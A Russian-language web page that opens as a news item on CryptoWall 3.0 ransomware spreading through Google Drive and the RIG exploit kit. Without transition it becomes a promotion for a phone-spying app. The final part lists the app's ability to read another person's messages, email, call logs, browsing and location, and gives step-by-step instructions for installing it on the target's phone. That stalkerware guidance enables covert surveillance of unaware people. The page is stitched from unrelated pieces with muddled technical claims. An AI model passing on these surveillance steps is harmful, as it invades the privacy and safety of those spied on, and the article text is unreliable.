Вредоносная программа CryptoWall 3.0 распространяется через Google Drive

b7881ca57abbfb839073063edc225052Специалисты по исследованию вопросов безопасности из Heimdal Security отмечают увеличенное количество ситуаций, связанных с использованием Google Drive для распространения функциональных элементов вируса. Ярким примером стало вымогательское приложение CryptoWall 3.0. Новая версия оказалась независимой от большинства антивирусных приложений. А использование Google Drive позволяет распространять материалы удалённо.

После первого этапа, когда функциональная часть вируса загружается, программа начинает координировать свою работу с более 80 сомнительных доменов. Набор эксплоитов RIG, который известен всем хакерам уже несколько дней, также упрощает функционирование данной системы. Справиться с ней теперь сможет даже злоумышленник со средним уровнем знаний. Используются уязвимости, найденные в JavaJRE, Adobe Reader, Internet Explorer и Flash Player. Поскольку многие пользователи своевременно не загружают свежие обновления, то дыры остаются открытыми.

Если говорить о стоимости использовании RIG, то в неделю данный набор обойдётся в 150$. Это самый дешёвый вариант, доступный на «чёрном» хакерском рынке. Затрагивает проблема и пользователей Android, поскольку Google Drive используется и на мобильных телефонах. Если на устройстве отсутствуют обновления, то RIG скачивает заранее сформированный список URL-адресов. Скомпрометированные WEB-страницы позволяют получить доступ к различного рода информации. После проникновения в систему данные шифруются при помощи 2048-ключа, расшифровать который без соответствующих утилит будет сложно.

Как обезопасить себя? Проверять все ссылки, ведущие на таблицы Google Drive. Особенно если такие ссылки пересылаются вам по Skype и через социальные сети. Часто для этого используются взломанные аккаунты пользователей. Работа с Google Drive относительно безопасная, но при внимательной проверке всех данных, к которым у вас открывается доступ. Версия для Android более безопасна, поскольку эксплоит RIG не работает для этой системы. Но есть альтернативные хакерские решения.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.